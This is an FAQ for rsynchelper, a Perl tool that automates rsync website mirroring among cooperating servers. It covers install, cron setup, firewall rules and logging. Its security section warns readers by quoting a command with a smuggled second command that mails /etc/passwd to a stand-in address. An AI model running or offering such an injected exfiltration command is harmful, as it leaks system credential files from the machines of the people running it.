Here is the FAQ (also in the sourcecode)
rsynchelper README
Version: $Id: FAQ,v 1.1 2001/02/27 09:10:28 saralin Exp $
Copyright Sara Lin
Released under GPL - see LICENCE

1. Questions for people thinking about installing rsynchelper
2. Details on mirroring a site from another server
3. Details on asking servers in your buddylist to mirror a site on your server

-------------------------------------------------------------------
1. Questions for people thinking about installing rsynchelper

1.1) What is mirroring? Why mirror?
1.2) rsynchelper in non-technical language.
1.3) What are the pre-requisites for using rsynchelper?
1.4) rsynchelper in technical language.
1.5) Is it a lot of work to be a mirror? What are the downsides?
1.6) Sounds good -- how do I become a mirror? What is the install process?
1.7) Joining or setting up a buddylist

-------------------------------------------------------------------
2. Details on mirroring a site from another server

2.1) I've gotten a request to mirror a site -- what do I do?
2.2) I don't want to choose what I mirror on a site-by-site basis.
     Can I setup broader mirroring to servers I trust?
2.6) I'm having problems mirroring -- what should I do?
2.7) I run NT, can I participate?
2.8) I can view my own rsync server modules, but other people can't
     view mine, or I can't view other people's. Is there a firewall issue?
2.9) I have an existing /etc/rsyncd.conf - can I safely install this program?
2.10) Is rsynchelper secure? Are there any security issues?
2.11) Why doesn't rsynchelper use ssh?
2.12) I think I've mirrored a site, but how can I tell?
2.13) Do I have to be in a certain directory to run rsynchelper?
      Do I run it as a certain user?

-------------------------------------------------------------------
3. Details on asking servers in your buddylist to mirror a site on your server

3.1) How do I get other hosts to mirror a site?
3.2) How does a member of the public get to the mirrored site?
     What is the mirrored site's new URL?
3.3) I want servers to stop mirroring my site, what do I do?
3.4) How do I convert non-mirrorable absolute links to relative links?
3.5) How do I know that other hosts successfully mirrored from me?
     Where is a log of who has mirrored my site?

==========================================================================
---- Answers
==========================================================================

1.1) What is mirroring? Why mirror?

A simple definition of mirroring: "When one server makes an exact copy
of the content on another server."

Why mirror? These are a few possible motives:
  a) make a closer copy of the content to make downloads faster
  b) join the bandwidth capacity of several servers to cope with
     popular sites
  c) demonstrate support for the content
  d) defend against suppression of the content

Popular open-source software projects are the group that uses mirrors
most often. Controversial web sites on human rights or corporate
whistle-blowing also use mirroring. rsynchelper is only a generic
tool -- you are responsible for your own choices of what content to
mirror.

1.2) rsynchelper in non-technical language.

rsynchelper is designed to make it quick and easy for a loose group of
mirrors to set up mirroring time and time again. rsynchelper:
  a) makes it easier to make your content available for others to mirror
  b) makes it easier to mirror someone else's content
  c) automates maintaining an accurate list of who is mirroring which
     content

It takes about 5-10 minutes to set up rsynchelper the first time. Each
time a server in a buddy network gets a request to mirror a site, its
administrator can set up the mirroring simply by cutting and pasting a
single command (less than a minute). Each member of the mirror network
chooses whether or not to mirror each site. There is an automatically
generated and often widely distributed list of which servers are
mirroring each site.

1.3) What are the pre-requisites for using rsynchelper?

rsynchelper helps linux/unix computers use the mirroring program rsync.
rsync can be found at http://rsync.samba.org/ -- it is the state of the
art for efficiently synchronizing files between servers.

To use rsynchelper to mirror others you only need perl and rsync.
To make your information available to others, you need root access and
must NOT have the rsync port blocked by a firewall.

1.4) rsynchelper in technical language.

A server (host X) asks others on the mirrorlist:
"Please mirror the site called 'site1' from me."

A server Y chooses to mirror the site and runs the command:

    rsynchelper hostX::mirror_me/site1 /hostX/

This copies files from host X to host Y and puts them in a directory on
host Y. To get to the site, the general public will then go to
http://hostY/mirrors/hostX/site1

For more on how this works, read Section 2 of this FAQ.

To review what a single server needs to participate in a mirror network:
  a) To be able to mirror others, you use the program 'rsync'.
  b) To set up regular mirroring, you run rsync via cron.
  c) To have other servers mirror you, you need to run the rsync
     server 'rsyncd', and edit /etc/rsyncd.conf

rsynchelper has two pieces -- an installer and a script:
  a) the installer configures your computer to be an rsync server,
     i.e. it edits, when needed,
         /etc/rsyncd.conf
         /etc/services
         /etc/inetd.conf
     By default, it links the rsync module 'mirrors' to a directory
     available to your webserver.
  b) the perl script rsynchelper simplifies common mirroring tasks via
     rsync and cron. It helps beginning unix administrators to easily
     act as mirrors.

There is another script, 'mirrorlist', that plays a supportive role.
Not every server running rsynchelper needs to run mirrorlist.
mirrorlist:
  c) polls a list of servers and creates an up-to-date list of which
     servers are mirroring each site on the list.

1.5) Is it a lot of work to be a mirror? What are the downsides?

TO INSTALL: After skimming this document, it will take less than 5
minutes to install rsynchelper.
If you need to install rsync, that will also only take a few minutes.
If you need to open up your firewall to allow access to rsyncd, this
will take additional time, depending on local setup and skill.

TO MAINTAIN: When a site comes up for protection and you want to mirror
it, you only need to cut and paste one command from an email message to
start mirroring the site.

SYSTEM USAGE: The first time you mirror a site, you download the whole
site. Each night, your cronjob downloads only the changes, often less
than 1% of the size of the whole site. Some people will web-browse your
mirror. Most visitors will go to the mirrors they perceive as
high-bandwidth/fast sites, so visitors will probably not consume too
much bandwidth.

TIME: It takes some time to monitor a buddylist listserv and decide
whether you want to mirror a site. Some content may not be appropriate
for your server. Most buddylist listservs have very low traffic.

1.6) Sounds good -- how do I become a mirror? What is the install process?

To install:
  a) get the latest version of the sourcecode from
     http://sourceforge.net/files/project=xxxx
  b) install rsynchelper
         gunzip -c rsynchelper-x.tar.gz | tar xf -
         cd rsynchelper && perl install.pl   # on some systems this will be perl5 install.pl
  c) possibly open up your firewall
     You may need to open up your firewall to allow other people to
     mirror sites from you via rsync. If you have a firewall, see FAQ 2.8
  d) join or set up a buddylist
     see FAQ 1.7

1.7) Joining or setting up a buddylist

rsynchelper is designed to make it easy for a group of servers (a
buddylist) to join together regularly in mirroring sites. There are two
buddylist aspects to mirroring:
  * Getting on a mailinglist where new requests for mirroring are posted
  * Having your server be automatically 'polled' to see what sites are
    being mirrored.
To join a buddylist, you
  a) install rsynchelper
  b) join a mailinglist for a buddylist
  c) send your configuration to the mirrorlist servers, who will poll you

To set up a new buddylist, you
  a) install rsynchelper on several servers
  b) install mirrorlist on one or more servers
  c) create a mailinglist for people to join
  d) ask others to join your buddylist by publicizing the email
     address for the maintainers of b) and c)

If you run a server at a university, business, or as an individual, you
probably want to join an existing buddylist. Each buddylist is
independent, so you need to find the homepage of the buddylist(s) that
you are interested in. Generally people reading this document will do so
from a buddylist homepage. Some buddylist homepages are listed at:
    http://rsynchelper.sourceforge.net/external_links/

If you are an association of servers, or are concerned with a
particular type of content not served by existing buddylists, you may
want to set up your own buddylist. After it is up and running, you may
want to add your list to:
    http://rsynchelper.sourceforge.net/external_links/

--------------------------------------------------------------------
2.1) I've gotten a request to mirror a site -- what do I do?

If you join a buddylist listserv, you will get requests from servers to
mirror their sites. If you choose to mirror the site, cut and paste the
rsynchelper command they suggest. They will probably suggest you run a
command like:

    rsynchelper -c server.org::mirror_me/test1 /server.org/

The -c option will semi-automatically set up ongoing mirroring (by
putting the rsynchelper command in cron). If you would rather edit your
crontab manually, do not use -c; use -v instead to see the suggested
crontab entry:

    rsynchelper -v server.org::mirror_me/test1 /server.org/

The crontab entry will look something like this:

    0 1 * * * rsynchelper server.org::mirror_me/test1 /server.org/

This will be in the crontab of the user who owns the mirror_me directory.
This user is usually 'nobody', but you pick this user when you run
install.pl

2.2) I don't want to choose what I mirror on a site-by-site basis.
     Can I setup broader mirroring to servers I trust?

Yes. You have two options for 'trust' based automation.

A) To mirror all sites that server.org ASKS you to mirror, do:

    rsynchelper server.org::mirror_me/* /server.org/

B) You can also play 'follow the leader', and mirror the same sites
   that another server mirrors. For example, to mirror everything that
   server.org mirrors from other people, do:

    rsynchelper server.org::mirrors/* /

2.6) I'm having problems mirroring -- what should I do?

Contact your buddylist listserv or technical contact for help. If you
are a buddylist technical contact, you should join
firstname.lastname@example.org where you can give and receive advice.

You may also want to read up on rsync, as the mirror system is built on
it. Read
    'man rsync'
    'man rsyncd.conf'
The rsync homepage has a number of good tutorials, including
http://www.eunuchs.org/linux/rsync/

2.7) I run NT, can I participate?

Not yet. rsynchelper would need to be ported to NT. rsync itself runs
fine on NT, so you can participate if you are willing to port
rsynchelper.pl to NT. rsynchelper is a perl script, which can work on
NT; however, the paths to $mirrors and $rsync_bin would have to be
edited, and the cron handling dealt with. The install.pl program will
not work, as it relies too much on a UNIX environment.

2.8) I can view my own rsync server modules, but other people can't
     view mine, or I can't view other people's. Is there a firewall issue?

There is probably a firewall issue. For your rsync server to be visible,
port 873 needs to be open. To reconfigure your firewall, you should know
what you are doing! On a cisco system, you would add something like this
line (replacing 192...)
    access-list 101 permit tcp any host 192.168.1.33 eq 873

On a computer that uses IPCHAINS, if the default input policy to your
host is DENY, you may open the port with:

    ipchains -I input -d 192.168.1.33 873 -p tcp -j ACCEPT

(replace the IP number above with your host's IP)

2.9) I have an existing /etc/rsyncd.conf - can I safely install this program?

Yes. Keep a backup copy of /etc/rsyncd.conf, and then run install.pl
Then look at /etc/rsyncd.conf and check that the modules look OK.

2.10) Is rsynchelper secure?

The most obvious danger with rsynchelper is that people often use it in
conjunction with a mailinglist -- they get requests from the mailinglist
to mirror a site and cut and paste the rsynchelper command onto the
command line. Whenever you run a command, you should look carefully at
the command. It is fine if the command looks like:

    rsynchelper -c server.org::mirrors/site1 /server.org/

But don't run it if it looks like:

    rsynchelper -c s.org::mirrors/1 /s/ ; Mail -s1 email@example.com < /etc/passwd

Also, look at the second argument -- is it normal, or does it contain
special characters? Don't run the command if you are suspicious.

Basically, the current use of rsync by rsynchelper is as secure as rsync
is. It is secure unless there are undiscovered buffer overflows, etc.

2.11) Why doesn't rsynchelper use ssh?

Summary of the issue: rsh is badly broken, and often opens up security
holes. ssh is a drop-in replacement for rsh, which is both more secure
AND encrypts traffic.

rsynchelper uses rsync in the special rsync-server mode. This mode does
not use either ssh or rsh, and it is not vulnerable to the same problems
as rsh. However, this mode does not encrypt traffic. Luckily, in our
case, the traffic is publicly available webpages.

We don't run rsync over ssh because then servers would need accounts on
each other (for ssh logins). Most big mirror networks use the special
rsync server mode that we use.

2.12) I think I've mirrored a site, but how can I tell?
The simplest thing is to run rsynchelper with the -v option the first
time you mirror the site. It will show you the files it is copying. With
or without the -v option, rsynchelper should tell you if it runs into
trouble.

You can also just look in the file system and see whether or not the new
site has been mirrored to your server. If you ran the command

    rsynchelper server.org::mirrors/site1 /server.org/

then there should be a directory full of files at:

    $mirrors/server.org/site1

2.13) Do I have to be in a certain directory to run rsynchelper?
      Do I run it as a certain user?

You do NOT have to be inside the correct directory before running
rsynchelper. One of the jobs of rsynchelper is to set up the correct
environment for rsync.

You can run rsynchelper as either root or the correct user. If it is run
as root it will switch to the user specified in /etc/rsynchelper.conf

--------------------------------------------------------------------
Publishing Threatened Sites

3.1) How do I get other hosts to mirror a site?

Put mirror-able files in a subdirectory of your mirror_me directory.
HTML files will need to use relative links, or they won't mirror well.
If your HTML files use absolute links, see FAQ 3.4

Email the mailinglist to let people know you want mirrors. Tell people
the commands to run to mirror your site.

-start of email-
Please run this command to immediately mirror us:

    rsynchelper -c rsync://my.server.org/sitename /my.server.org/

This site is about xxx, and is size xxx.
-end of email-

If you are concerned about authentication, PGP sign your message and say
where people can go to get your public key.

3.2) How does a member of the public get to the mirrored site?
     What is the mirrored site's new URL?

Once a site has been mirrored, the public still needs to view an 'index'
page that lists where the mirrors are. Some 'indexing servers' poll all
the servers in a buddylist and assemble a list of who is mirroring what.

3.3) How do I get servers to stop mirroring my site?
Email your buddylist and ask people to run, for example,

    rsynchelper -R rsync://my.server.org/sitename /my.server.org/

Some people may require that you PGP sign your 'stop' request to prevent
vandals from forging a stop request.

3.4) How do I convert non-mirrorable absolute links to relative links?

You can use w3mir or wget. The wget manual explains how to do this under
Directory.
    http://www.gnu.org/manual/wget/index.html
Here is a summary:

    # create the directory where you will put the files, like:
    mkdir /tmp/local_links
    cd /tmp/local_links
    wget -r -k -nH http://some.virtual.com/
    # or, if the original site is already in a subdirectory
    wget -r -k -nH --cut-dirs=1 http://some.host.com/somedir/index.html

3.5) How do I know that other hosts successfully mirrored from me?
     Where is a log of who has mirrored my site?

By default, rsyncd logs to the syslog daemon, which in turn logs
different types of messages to different log files. On my laptop, this
means that I get informational messages about rsync transfers in
/var/log/messages, but the exact logfile will depend on your
/etc/syslog.conf

You can also specify a log file directly in /etc/rsyncd.conf. Read
'man rsyncd.conf' for how to customize logging. 'man syslog.conf' may be
helpful if you are trying to understand syslog for the first time.
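
As a rough sketch of the syslog approach described in 3.5, the shell
functions below pull rsyncd entries out of a log file. This is not part
of rsynchelper: the function names are hypothetical, the default path
/var/log/messages is only the example mentioned above, and the pattern
assumes the common syslog tag format 'rsyncd[PID]:'. Adjust all of these
to match your own /etc/syslog.conf.

```shell
#!/bin/sh
# Hypothetical helpers (not shipped with rsynchelper).

# Print every line in a syslog file that was written by rsyncd.
# $1 = log file; defaults to /var/log/messages, which is an assumption
#      and depends on your syslog configuration.
rsyncd_log_lines() {
    logfile="${1:-/var/log/messages}"
    # syslog usually tags each line with the program name and PID,
    # e.g. "rsyncd[1234]:" (assumed format).
    grep 'rsyncd\[[0-9]*\]:' "$logfile"
}

# Narrow the rsyncd lines down to one module/site.
# $1 = log file, $2 = fixed string to look for, e.g. "mirror_me/site1"
rsyncd_log_for_site() {
    rsyncd_log_lines "$1" | grep -F -- "$2"
}
```

For example, after sourcing the functions,
'rsyncd_log_for_site /var/log/messages mirror_me/site1' would list the
logged rsyncd activity that mentions that site, provided your syslog
writes rsyncd messages to that file.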